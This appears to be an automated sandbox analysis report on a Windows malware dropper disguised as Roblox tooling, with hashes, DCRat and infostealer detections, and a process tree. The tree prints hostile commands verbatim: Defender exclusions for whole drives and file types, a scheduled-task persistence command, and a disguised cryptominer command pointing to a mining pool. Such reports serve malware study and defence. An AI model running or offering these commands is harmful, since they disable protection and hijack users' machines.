Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-07-2024 20:24

General

  • Target

    2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

  • Size

    9.5MB

  • MD5

    4050f2027e946d524e3a1078a6cd5419

  • SHA1

    698f02a2826e7d6ecfebf37b04f0231c904133eb

  • SHA256

    2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

  • SHA512

    fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab

  • SSDEEP

    196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ

Malware Config

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies WinLogon for persistence 2 TTPs 18 IoCs
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • .NET Reactor protector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 35 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
    "C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"
    1⤵
    • DcRat
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
      "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Users\Admin\AppData\Local\Temp\Result.exe
        "C:\Users\Admin\AppData\Local\Temp\Result.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
          "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
          • C:\Windows\SysWOW64\msiexec.exe
            "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
            5⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            PID:1524
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 1656
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2080
        • C:\Users\Admin\AppData\Local\Temp\solara.exe
          "C:\Users\Admin\AppData\Local\Temp\solara.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
            5⤵
              PID:2932
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
                6⤵
                • Loads dropped DLL
                PID:784
                • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                  "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                  7⤵
                  • Modifies WinLogon for persistence
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2980
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1788
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:912
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3032
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\ja-JP\smss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1772
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1292
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1484
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\services.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\Refcrt.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1952
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1276
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:584
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\sppsvc.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2360
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Windows\explorer.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:564
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1576
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2432
                  • C:\Windows\twain_32\sppsvc.exe
                    "C:\Windows\twain_32\sppsvc.exe"
                    8⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:848
        • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
          "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
            4⤵
              PID:1920
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
                5⤵
                • Loads dropped DLL
                PID:2112
                • C:\winNet\ComContainerbrowserRefRuntime.exe
                  "C:\winNet/ComContainerbrowserRefRuntime.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:2976
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0lbrM5rdln.bat"
                    7⤵
                      PID:2876
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:2840
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          8⤵
                            PID:1744
                          • C:\winNet\WerFault.exe
                            "C:\winNet\WerFault.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:2096
                • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2752
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1228
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2376
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2756
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2100
                    • C:\Windows\System32\cmd.exe
                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2448
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                        6⤵
                        • DcRat
                        • Scheduled Task/Job: Scheduled Task
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2712
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                      5⤵
                      • Loads dropped DLL
                      PID:2712
                      • C:\Users\Admin\Bloxstrap.exe
                        C:\Users\Admin\Bloxstrap.exe
                        6⤵
                        • Executes dropped EXE
                        PID:1744
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                          7⤵
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          PID:2620
                          • C:\Windows\System32\cmd.exe
                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                            8⤵
                              PID:1952
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                PID:2348
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                PID:2040
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:236
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "/sihost64"
                                9⤵
                                  PID:2040
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                8⤵
                                  PID:2228
                      • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                        "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1212
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                          4⤵
                            PID:2972
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                              5⤵
                              • Loads dropped DLL
                              PID:2136
                              • C:\DriversavessessionDlldhcp\Roblox.exe
                                "C:\DriversavessessionDlldhcp/Roblox.exe"
                                6⤵
                                • Modifies WinLogon for persistence
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:1856
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltcsaawt\ltcsaawt.cmdline"
                                  7⤵
                                    PID:1644
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDF.tmp" "c:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\CSC37168581A8D94A6C84CFBC64B17B38F4.TMP"
                                      8⤵
                                        PID:2936
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2winfxb\a2winfxb.cmdline"
                                      7⤵
                                        PID:2816
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C.tmp" "c:\Users\Admin\Music\CSC6D5C1AFCD1984D5EBFD1EC6CEC5D8814.TMP"
                                          8⤵
                                            PID:2904
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zo10lvbw\zo10lvbw.cmdline"
                                          7⤵
                                          • Drops file in Windows directory
                                          PID:1020
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1056.tmp" "c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP"
                                            8⤵
                                              PID:1908
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3q4jp1de\3q4jp1de.cmdline"
                                            7⤵
                                              PID:956
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10B3.tmp" "c:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\CSCA59D324A68AE4B22A6E15266FD9E16AA.TMP"
                                                8⤵
                                                  PID:2108
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q01gslrh\q01gslrh.cmdline"
                                                7⤵
                                                • Drops file in Program Files directory
                                                PID:2248
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1130.tmp" "c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP"
                                                  8⤵
                                                    PID:912
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcjwnium\hcjwnium.cmdline"
                                                  7⤵
                                                    PID:2880
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CC.tmp" "c:\DriversavessessionDlldhcp\CSC559EE64D83AC4A8280A5A24C5B60E145.TMP"
                                                      8⤵
                                                        PID:1616
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnbjk2l\flnbjk2l.cmdline"
                                                      7⤵
                                                        PID:2972
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1297.tmp" "c:\MSOCache\All Users\CSCF356FD83CFB9430EA0EF1F52A39F846.TMP"
                                                          8⤵
                                                            PID:1944
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4veo0d4h\4veo0d4h.cmdline"
                                                          7⤵
                                                          • Drops file in Windows directory
                                                          PID:1868
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1304.tmp" "c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP"
                                                            8⤵
                                                              PID:2720
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5rfmmif\l5rfmmif.cmdline"
                                                            7⤵
                                                            • Drops file in Program Files directory
                                                            PID:1784
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1381.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP"
                                                              8⤵
                                                                PID:2936
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqleqlab\kqleqlab.cmdline"
                                                              7⤵
                                                                PID:1440
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13CF.tmp" "c:\Users\All Users\Microsoft\Windows\CSC13970AFFC3FB4AE3A9F39E5D723D41AB.TMP"
                                                                  8⤵
                                                                    PID:2904
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aryds0rx\aryds0rx.cmdline"
                                                                  7⤵
                                                                    PID:2104
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES141D.tmp" "c:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\CSC1DB539DCA86D44AD86BABAAFDEA71AB9.TMP"
                                                                      8⤵
                                                                        PID:2360
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j10hzyo0\j10hzyo0.cmdline"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:1232
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147A.tmp" "c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP"
                                                                        8⤵
                                                                          PID:1996
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq3esore\xq3esore.cmdline"
                                                                        7⤵
                                                                          PID:1532
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E8.tmp" "c:\Users\Admin\Music\CSC9B0B8199D9CF45F6B333935465BB2D70.TMP"
                                                                            8⤵
                                                                              PID:2732
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yeijp43\4yeijp43.cmdline"
                                                                            7⤵
                                                                            • Drops file in System32 directory
                                                                            PID:956
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1545.tmp" "c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP"
                                                                              8⤵
                                                                                PID:2684
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1724
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1044
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
